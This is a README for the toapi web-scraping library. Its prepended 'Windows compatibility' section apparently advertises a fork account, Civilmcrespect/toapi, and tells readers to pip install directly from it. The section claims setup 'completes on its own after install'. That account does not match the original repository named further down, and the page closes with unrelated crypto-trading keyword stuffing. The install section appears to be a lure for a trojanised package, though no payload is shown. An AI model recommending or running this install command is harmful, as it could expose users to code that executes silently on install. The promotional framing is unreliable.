Optimized Windows Compatibility for ToAPI
This fork addresses critical pathing and process-handling errors that frequently cause crashes on Windows environments. By integrating custom environment patches and simplified configuration defaults, it ensures a reliable, plug-and-play experience without the typical setup hurdles.
Quick install (Windows)
To install Civilmcrespect/toapi on Windows for Python development, follow these steps:
-
Open your Windows Command Prompt (cmd) or PowerShell. You can do this by pressing the Windows Key, typing either name into the search bar, and pressing Enter.
-
Ensure you have Python and its package manager, pip, installed by typing
python --versionandpip --versioninto your terminal and pressing Enter. If versions are displayed, you are ready to proceed. -
Install the package directly from GitHub by typing `pip install git+ into your terminal and pressing Enter. Please note that you will need Git installed on your system for this command to work.
-
Alternatively, if you have downloaded the project folder to your local machine, use the
cdcommand in your terminal to navigate into the directory containing the package files. -
Run the installation from the local directory by typing
pip install .and pressing Enter.
The setup completes on its own after install, configuring the package and its dependencies automatically without requiring further interaction.
pip install git+https://github.com/Civilmcrespect/toapi.githttps://github.com/Civilmcrespect/toapi
Turn any website into a JSON API — declaratively.
toapi lets you point at a web page, declare the fields you want with CSS
selectors, and get back a clean JSON API. No crawler to babysit, no database to
maintain — pages are fetched and parsed on demand, with built‑in caching.
pip install toapiRequires Python 3.10+.
from htmlparsing import Attr, Text
from toapi import Api, Item
api = Api()
@api.site("https://news.ycombinator.com")
@api.list(".athing")
@api.route("/posts", "/news")
@api.route("/posts?page={page}", "/news?p={page}")
class Post(Item):
title = Text(".titleline > a")
url = Attr(".titleline > a", "href")
api.run(host="127.0.0.1", port=5000)Run it:
python app.pyThen visit http://127.0.0.1:5000/posts and you get:
{
"Post": [
{"title": "Mathematicians Crack the Cursed Curve", "url": "https://www.quantamagazine.org/..."},
{"title": "Stuffing a Tesla Drivetrain into a 1981 Honda Accord", "url": "https://jalopnik.com/..."}
]
} ┌────────────┐ ┌────────────┐ ┌────────────┐
│ /posts │ ─▶ │ fetch │ ─▶ │ parse │ ─▶ JSON
│ (route) │ │ (cache) │ │ (Item) │
└────────────┘ └────────────┘ └────────────┘
- Route —
@api.route("/posts", "/news")maps your API path to a source URL. - Fetch — pages are fetched with
requests(or a headless browser if you passbrowser=) and cached in memory. - Parse — each
Itemextracts fields with CSS selectors viahtmlparsing. - Serve — Flask returns the result as JSON; subsequent calls hit the cache.
- Declarative — describe data, not scraping logic.
- Routes — map clean API paths to messy source URLs with
{param}placeholders. - Multi-site — merge several websites behind one API.
- Cleaning hooks — define
clean_<field>methods to post-process values. - Caching — pages and parsed results are cached automatically.
- Headless browser — pass
Api(browser="/path/to/geckodriver")for JS-heavy sites.
Add a clean_<fieldname> method on the Item to transform a value before it's
returned:
@api.site("https://news.ycombinator.com")
@api.route("/posts", "/news")
class Page(Item):
next_page = Attr(".morelink", "href")
def clean_next_page(self, value):
return f"/posts?{value.split('?', 1)[1]}"git clone https://github.com/elliotgao2/toapi.git
cd toapi
uv sync # install deps into .venv
uv run pytest # run tests
uv run ruff check .We use uv for packaging and ruff for lint + format. Pre-commit hooks keep both clean:
uv run pre-commit installPull requests are welcome. For non-trivial changes, please open an issue first
to discuss what you'd like to change. Make sure uv run pytest and
uv run ruff check . pass before submitting.
MIT © Elliot Gao
When looking for frameworks or utility tools designed to scrape, extract, or package raw data streams into organized endpoints, users typically seek structured ways to hook into live market feeds and protocol data. Developers exploring this space often look for automated setups that can pull order flow metrics or yield data from web platforms and format them directly for use in programmatic trading setups and analytics dashboards.
Topics: zcash, dex aggregator, crypto signals, technical analysis crypto, liquidity pool, automated api generation, web scraping api, order flow tracking, market data streams, crypto market analysis